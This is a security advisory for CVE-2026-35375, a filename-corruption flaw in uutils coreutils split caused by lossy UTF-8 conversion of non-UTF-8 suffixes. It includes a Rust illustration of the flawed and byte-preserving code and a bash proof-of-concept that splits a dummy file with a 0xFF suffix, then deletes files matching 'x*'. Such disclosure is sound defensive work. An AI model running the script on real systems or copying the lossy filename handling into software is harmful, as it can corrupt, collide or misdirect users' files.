Security Vulnerability Report
CVE-2026-35375 CVSS 3.3 LOW

Published: 2026-04-22 17:16:42
Last Modified: 2026-05-04 19:13:37

Description

A logic error in the split utility of uutils coreutils causes the corruption of output filenames when provided with non-UTF-8 prefix or suffix inputs. The implementation utilizes to_string_lossy() when constructing chunk filenames, which automatically rewrites invalid byte sequences into the UTF-8 replacement character (U+FFFD). This behavior diverges from GNU split, which preserves raw pathname bytes intact. In environments utilizing non-UTF-8 encodings, this vulnerability leads to the creation of files with incorrect names, potentially causing filename collisions, broken automation, or the misdirection of output data.
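The collision described above, shown as an added example (not code from uutils coreutils or from this report). The helper names `chunk_name_lossy` and `chunk_name_raw` are hypothetical, the suffix bytes are constructed sample values, and the code assumes a Unix target.

```rust
// Added illustration (not uutils source): lossy vs. byte-preserving
// construction of a split-style chunk filename on Unix.
use std::ffi::{OsStr, OsString};
use std::os::unix::ffi::{OsStrExt, OsStringExt};

/// Hypothetical helper mirroring the flawed pattern: each component passes
/// through to_string_lossy(), so every invalid byte sequence becomes U+FFFD.
fn chunk_name_lossy(prefix: &OsStr, index: &str, suffix: &OsStr) -> OsString {
    let name = format!(
        "{}{}{}",
        prefix.to_string_lossy(),
        index,
        suffix.to_string_lossy()
    );
    OsString::from(name)
}

/// Hypothetical byte-preserving variant: concatenate the raw pathname bytes,
/// which is the behaviour the report attributes to GNU split.
fn chunk_name_raw(prefix: &OsStr, index: &str, suffix: &OsStr) -> OsString {
    let mut bytes = Vec::with_capacity(prefix.len() + index.len() + suffix.len());
    bytes.extend_from_slice(prefix.as_bytes());
    bytes.extend_from_slice(index.as_bytes());
    bytes.extend_from_slice(suffix.as_bytes());
    OsString::from_vec(bytes)
}

/// True when two distinct suffixes yield the same chunk filename.
fn collides(f: fn(&OsStr, &str, &OsStr) -> OsString, a: &[u8], b: &[u8]) -> bool {
    let x = OsStr::new("x");
    f(x, "aa", OsStr::from_bytes(a)) == f(x, "aa", OsStr::from_bytes(b))
}

fn main() {
    // Constructed sample suffixes: 0xFF and 0xFE are both invalid UTF-8.
    let (a, b): (&[u8], &[u8]) = (b".\xff", b".\xfe");
    let x = OsStr::new("x");
    let lossy = chunk_name_lossy(x, "aa", OsStr::from_bytes(a));
    let raw = chunk_name_raw(x, "aa", OsStr::from_bytes(a));
    println!("lossy bytes: {:02x?}", lossy.as_bytes());
    println!("raw bytes:   {:02x?}", raw.as_bytes());
    println!("lossy collides: {}", collides(chunk_name_lossy, a, b));
    println!("raw collides:   {}", collides(chunk_name_raw, a, b));
}
```

The same byte-level comparison works as a regression check: an output name containing the bytes EF BF BD where the input had a different invalid byte indicates the lossy path was taken.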

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:* - VULNERABLE
uutils coreutils < 0.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-35375: uutils coreutils split filename corruption
# This script demonstrates the filename collision issue using non-UTF-8 bytes.

echo "[+] Creating dummy input file..."
echo "Hello World" > input_data.txt

echo "[+] Attempting to split with non-UTF-8 suffix (byte 0xFF)..."
# In a vulnerable version of uutils split, this might replace 0xFF with �
# potentially causing collisions if other invalid bytes map to the same replacement.
# Note: Actual reproduction depends on the shell and locale settings.

# Create a suffix with raw hex byte 0xFF
SUFFIX=$(printf "\xff")

# Run split (assuming 'split' is the uutils version)
split -b 1 input_data.txt --additional-suffix="$SUFFIX"

echo "[+] Listing generated files:"
# List only the chunk files (default prefix "x"); grepping for "x" would also
# match permission bits and input_data.txt.
ls -l -- x*

echo "[!] If filenames contain replacement characters (�) instead of raw bytes, the vulnerability is present."

# Cleanup
rm -f x* input_data.txt

References

https://github.com/uutils/coreutils/pull/11397 (Exploit, Issue Tracking, Patch)
https://github.com/uutils/coreutils/releases/tag/0.8.0 (Release Notes)

Record Details

Status: Analyzed
Weakness: CWE-176
Exploitability Score: 1.8
Impact Score: 1.4